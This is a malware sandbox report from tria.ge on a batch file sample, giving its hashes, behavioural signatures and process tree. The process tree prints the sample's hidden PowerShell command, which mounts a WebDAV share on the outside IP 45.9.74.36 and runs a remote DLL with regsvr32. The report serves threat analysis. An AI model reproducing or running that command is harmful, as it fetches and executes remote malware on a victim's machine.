Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
23/07/2024, 03:27
Static task
static1
Behavioral task
behavioral1
Sample
1209140631077924736.bat
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
1209140631077924736.bat
Resource
win10v2004-20240709-en
General
-
Target
1209140631077924736.bat
-
Size
18KB
-
MD5
f23dde61b4953152a0e7b7dd18d9a7e8
-
SHA1
85f34fc4fde85b43c59aaa0b3841aea605f8573b
-
SHA256
ce8fa1b2db4640c2293cdd07d915ab60af865961c450a75a95eabca95187b8b8
-
SHA512
be0de8e2db58a1e860ee99acd7a712dc598226544e6cf08a33bc7657afff88b4b5279b56681b27fe1d448114f0c34cec66d097875b8fa93dac75b577830835d3
-
SSDEEP
384:lT8bJlUeKsvI+8R7vedXYPIDb/fA9Lq+zCYGjfd5soyBSa:EKsvZ8llIffA9LP/yfd5soyIa
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2620 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2620 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2228 wordpad.exe 2228 wordpad.exe 2228 wordpad.exe 2228 wordpad.exe 2228 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2436 wrote to memory of 2228 2436 cmd.exe 31 PID 2436 wrote to memory of 2228 2436 cmd.exe 31 PID 2436 wrote to memory of 2228 2436 cmd.exe 31 PID 2436 wrote to memory of 2620 2436 cmd.exe 32 PID 2436 wrote to memory of 2620 2436 cmd.exe 32 PID 2436 wrote to memory of 2620 2436 cmd.exe 32 PID 2620 wrote to memory of 2520 2620 powershell.exe 34 PID 2620 wrote to memory of 2520 2620 powershell.exe 34 PID 2620 wrote to memory of 2520 2620 powershell.exe 34 PID 2620 wrote to memory of 2712 2620 powershell.exe 35 PID 2620 wrote to memory of 2712 2620 powershell.exe 35 PID 2620 wrote to memory of 2712 2620 powershell.exe 35 PID 2620 wrote to memory of 2712 2620 powershell.exe 35 PID 2620 wrote to memory of 2712 2620 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1209140631077924736.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\30557255532975.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2520
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\30557255532975.dll3⤵PID:2712
-
-